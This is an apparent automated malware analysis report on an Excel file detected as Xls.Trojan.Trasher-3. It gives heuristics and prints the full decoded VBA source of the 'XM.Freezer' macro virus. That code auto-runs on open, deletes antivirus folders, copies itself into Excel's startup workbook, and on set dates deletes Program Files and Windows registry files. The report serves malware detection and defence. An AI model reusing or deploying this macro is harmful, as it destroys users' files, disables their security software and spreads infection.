Verdict: MALICIOUS

Risk Score: 320

Malware Insights

MITRE ATT&CK: T1059.005 Visual Basic
The sample is a malicious Excel file containing VBA macros. The Auto_Open macro attempts to disable antivirus software by deleting files from known AV installation directories and removes macro menu items. The `Shell()` call and the `Auto_Open` and `Auto_Close` macros indicate an attempt to execute arbitrary commands and potentially install persistence or download further payloads.
Heuristics (6)

- ClamAV: Xls.Trojan.Trasher-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Trasher-3
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2451 bytes |

SHA-256: 26eef91e9f6cc772cb633fd69a452b8650309ce302ff5aa58f44c56eeb9eac55

Detection (ClamAV): Xls.Trojan.Trasher-3

Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "Sheet3"
'********************************
'* Name : XM.Freezer *
'* Created : February 5, 1998 *
'* Author : ULTRAS *
'********************************
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    Call Auto_Close
    Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
    MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\Program Files\FindVirus\*.*"
    MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\f-macro\*.*"
    MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\Program Files\Command Software\F-PROT95\*.*"
    MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\Program Files\McAfee\VirusScan\*.*"
    MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\Program Files\Norton AntiVirus\*.*"
    Call Joke
End Sub
Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    ULTRAS = 0
    Freezer = 0
    Application.ScreenUpdating = False
    For b = 1 To Application.Workbooks.Count
        If Application.Workbooks(b).Name = "PERSONAL.XLM" Then
            ULTRAS = 1
            For u = 1 To Application.Workbooks("PERSONAL.XLM").Modules.Count
                If Application.Workbooks("PERSONAL.XLM").Modules(u).Name = "Sheet3" Then
                    Freezer = 1
                End If
            Next
            If Freezer = 0 Then
                Windows("PERSONAL.XLM").Visible = True
                Application.Workbooks("Freezer.XLM").Modules("Sheet3").Copy after:=Application.Workbooks("PERSONAL.XLM").Modules(1)
                Windows("PERSONAL.XLM").Visible = False
                Application.Workbooks("PERSONAL.XLM").Save
            End If
        End If
    Next
    If ULTRAS = 0 Then
        newname$ = ActiveWorkbook.Name
        Application.Workbooks(newname$).SaveCopyAs Application.StartupPath + "\PERSONAL.XLM"
        Application.Workbooks.Open (Application.StartupPath + "\PERSONAL.XLM")
        Windows("PERSONAL.XLM").Visible = False
        Application.Workbooks("PERSONAL.XLM").Save
    End If
    Application.ScreenUpdating = True
End Sub
Sub Joke()
Attribute Joke.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo HaHaHa
    If Day(Now()) = 14 Then
        MsgBox "You Infected XM.Freezer by ULTRAS", 16, "ULTRAS"
        Shell ("Deltree /y C:\Progra~1")
    End If
    If Day(Now()) = 28 Then
        MsgBox "You Infected XM.Freezer by ULTRAS", 48, "ULTRAS"
        SetAttr "c:\windows\user.dat", 0
        SetAttr "c:\windows\user.da0", 0
        Kill "c:\windows\user.dat"
        Kill "c:\windows\user.da0"
    End If
HaHaHa:
End Sub
```